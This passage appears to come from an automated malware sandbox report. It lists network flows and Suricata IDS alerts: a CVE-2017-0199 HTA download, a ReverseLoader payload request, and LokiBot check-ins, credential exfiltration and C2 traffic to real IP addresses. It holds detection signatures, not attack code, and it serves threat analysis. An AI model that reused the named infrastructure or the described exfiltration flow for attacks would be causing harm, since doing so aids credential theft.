              Source: global trafficTCP traffic: 198.46.178.155:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.155:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.155:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.155:80
              Source: global trafficTCP traffic: 198.46.178.155:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 198.46.178.155:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.155:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.155:80
              Source: global trafficTCP traffic: 198.46.178.155:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 198.46.178.155:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 198.46.178.155:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 198.46.178.155:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 198.46.178.155:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 198.46.178.155:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.155:80
              Source: global trafficTCP traffic: 198.46.178.155:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 198.46.178.155:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 198.46.178.155:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.155:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.155:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.155:80
              Source: global trafficTCP traffic: 198.46.178.155:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 198.46.178.155:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 198.46.178.155:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.155:80

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 198.46.178.155:80 -> 192.168.2.22:49164
              Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 198.46.178.155:80 -> 192.168.2.22:49166
              Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49167 -> 198.46.178.155:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49181 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49181 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49181 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49183 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49180 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49183 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49180 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49180 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49184 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49184 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49184 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49183 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49180 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49181 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49181 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49183 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49183 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49199 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49199 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49199 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49201 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49201 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49201 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49205 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49205 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49205 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49211 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49211 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49211 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49199 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49199 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49192 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49184 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49192 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49184 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49201 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49201 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49192 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49179 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49179 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49183
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49179 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49199
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49184
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49200 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49200 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49200 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49201
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49195 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49181
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49211 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49200 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49195 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49205 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49179 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49211 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49192 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49188 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49188 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49188 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49195 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49191 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49205 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49200 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49202 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49214 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49214 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49209 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49196 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49205
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49196 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49185 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49196 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49200
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49214 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49202 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49202 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49193 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49194 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49194 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49193 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49188 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49209 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49188 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49209 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49213 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49211
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49213 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49214 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49213 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49214 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49195 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49219 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49215 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49209 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49191 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49194 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49215 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49215 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49188
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49185 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49194 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49185 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49196 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49194 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49212 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49213 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49219 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49191 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49219 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49187 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49212 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49214
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49212 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49196 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49215 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49207 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49198 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49185 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49207 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49198 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49198 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49207 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49196
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49213 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49198 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49192 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49182 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49219 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49219 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49187 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49182 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49191 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49187 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49193 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49194
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49212 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49185 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49195 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49198 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49182 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49206 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49215 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49209 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49193 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49185
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49212 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49195
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49202 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49202 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49213
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49191 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49210 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49182 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49193 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49209
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49206 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49206 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49182 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49187 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49206 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49206 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49187 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49212
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49198
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49193
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49210 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49210 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49202
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49206
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49210 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49210 -> 94.156.177.220:80
